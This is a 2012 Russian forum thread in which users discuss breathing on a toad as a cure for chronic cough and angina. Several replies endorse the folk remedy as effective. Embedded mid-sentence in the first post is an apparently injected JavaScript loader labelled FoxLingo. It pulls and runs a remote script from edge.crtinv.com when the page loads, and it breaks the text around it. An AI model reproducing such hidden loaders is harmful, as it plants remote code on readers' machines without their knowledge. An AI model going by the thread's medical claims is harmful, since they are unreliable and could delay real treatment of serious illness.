Аноним• 26 сентября 2012
Средство от кашля подышать на жабу?
Доброго времени суток, милые девушки!
Сразу прошу, не смейтесь! От отчаяния и не в такое поверишь...
Говорят, что при тяжелых болезней с кашлем, когда ничего не помогает, < id="FoxLingoJs"> !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.xx=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.xx=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); нужно подышать на жабу.
Вопрос: известны ли Вам реальные случаи излечения, или наоборот, когда не помогло?
Милые девушки, еще раз прошу: не смейтесь, не дай Бог кому такой болезни...
Более 20 лет борьбы, уже все средства испробованы...
Аноним• 26 сентября 2012
А что тут смешного. Я слышала о таком средстве, говорят очень действенное. Но к сожалению лично не пробывала.
Это отличное средство, помогает даже при серьезных проблемах с горлом и дыхательной системой. Только не все знают, что просто так делать нельзя - нужно поймав жабу попросить прощения и попросить помочь - забрать болезнь, и после процедуры повторить благодарность )
иначе одна проблема уйдет, другие появятся
это вы уже в другую степь:-)
я думаю что лягушка когда испытывает стресс, находясь у вас в руках, выделяет какое то вещество, которое лечит. как это просить лягушку чтоб вылечила? может еще с ней посидеть по душам, выговориться? шутка. а просить исцеления нужно у Бога. он только может исцелить.
Марина 5555• 27 сентября 2012
Экзотичный способ лечения практиковали в странах Ближнего и Среднего Востока (впрочем, говорят, подобным образом ’врачевали’ и в некоторых областях России). Больным ангиной предлагали ... подышать на жабу или лягушку. Чем большего размера удавалось поймать серое или зеленое ’лекарство’, тем лучше. Жабу или лягушку подносили ко рту больного и заставляли усиленно на нее дышать. По мнению знахарей, десяти минут было вполне достаточно, чтобы болезнь ’переселилась’ в несчастное животное (оно вскоре должно было ’откинуть лапки’), а человек полностью выздоровел.
Из газеты ’Правда севера’
Марина 5555• 27 сентября 2012
Ответ дляАноним
А как ребенка 1.5 годика заставить подышать на жабу???
как подышать не знаю, но в руки точно возьмёт, потискает, на вкус попробует, захочет посмотреть, что внутри ))))))